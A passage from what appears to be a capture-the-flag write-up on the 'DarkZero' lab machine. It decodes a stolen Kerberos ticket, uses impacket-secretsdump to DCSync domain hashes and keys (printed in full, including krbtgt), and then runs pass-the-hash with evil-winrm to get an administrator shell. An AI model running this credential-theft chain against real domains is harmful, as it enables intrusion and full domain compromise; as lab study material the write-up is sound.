dgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQgkcYPHQ9dmapvND6uyfpdPdRVDd/ogbrfcx9lePb4mo+hDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDYwNzQ4NDdaphEYDzIwMjUxMDA2MTc0ODQ3WqcRGA8yMDI1MTAxMjIyMTgyMlqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=" | base64 -d > dc01.kirbi
Now we convert to cache.
1
2
3
4
5
└─$ impacket-ticketConverter dc01.kirbi dc01.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
Then set the ticket.
1
└─$ export KRB5CCNAME=dc01.ccache
Let’s dump all the hash.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
└─$ impacket-secretsdump -k -no-pass -just-dc DC01.darkzero.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7:::
john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::
darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:95e4ba6219aced32642afa4661781d4b:::
[*] Kerberos keys grabbed
Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
Administrator:0x13:a23315d970fe9d556be03ab611730673
Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362
Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726
krbtgt:aes256-cts-hmac-sha1-96:6330aee12ac37e9c42bc9af3f1fec55d7755c31d70095ca1927458d216884d41
krbtgt:aes128-cts-hmac-sha1-96:0ffbe626519980a499cb85b30e0b80f3
krbtgt:0x17:64f4771e4c60b8b176c3769300f6f3f7
john.w:0x14:f6d74915f051ef9c1c085d31f02698c04a4c6804d509b7c4442e8593d6d957ea
john.w:0x13:7b145a89aed458eaea530a2bd1eb93bd
john.w:aes256-cts-hmac-sha1-96:49a6d3404e9d19859c0eea1036f6e95debbdea99efea4e2c11ee529add37717e
john.w:aes128-cts-hmac-sha1-96:87d9cbd84d85c50904eba39d588e47db
john.w:0x17:44b1b5623a1446b5831a7b3a4be3977b
DC01$:aes256-cts-hmac-sha1-96:25e1e7b4219c9b414726983f0f50bbf28daa11dd4a24eed82c451c4d763c9941
DC01$:aes128-cts-hmac-sha1-96:9996363bffe713a6777597c876d4f9db
DC01$:0x17:d02e3fe0986e9b5f013dad12b2350b3a
darkzero-ext$:aes256-cts-hmac-sha1-96:eec6ace095e0f3b33a9714c2a23b19924542ba13a3268ea6831410020e1c11f3
darkzero-ext$:aes128-cts-hmac-sha1-96:3efb8a66f0a09fbc6602e46f22e8fc1c
darkzero-ext$:0x17:95e4ba6219aced32642afa4661781d4b
[*] Cleaning up...
Got the hash for Administrator
in DC01
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ evil-winrm -i 10.129.121.112 -u administrator -H 5917507bdf2ef2c2b0a869a1cba40726
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/5/2025 3:18 PM 34 root.txt
-ar--- 10/5/2025 3:18 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
12432b7510c88dce8ba1c564825c25c1
BOOM! Got our real root.txt
flag :D.
From my perspective, I thinking that the way from svc_sql
to nt system
in DC02
is quite unintended as it exploited via cve_2024_30088_authz_basep
so we gonna do things that will not using cve.
This could be running SharpHound
on DC02
and then check if it has ADCS
so we can view via the graph and exploit to get root
.
And we gonna doing some other reverse shell just to know that this can be exploited in more than 1 way.
Stay tuned, I gonna update this later on :>. Have fun with next machine :D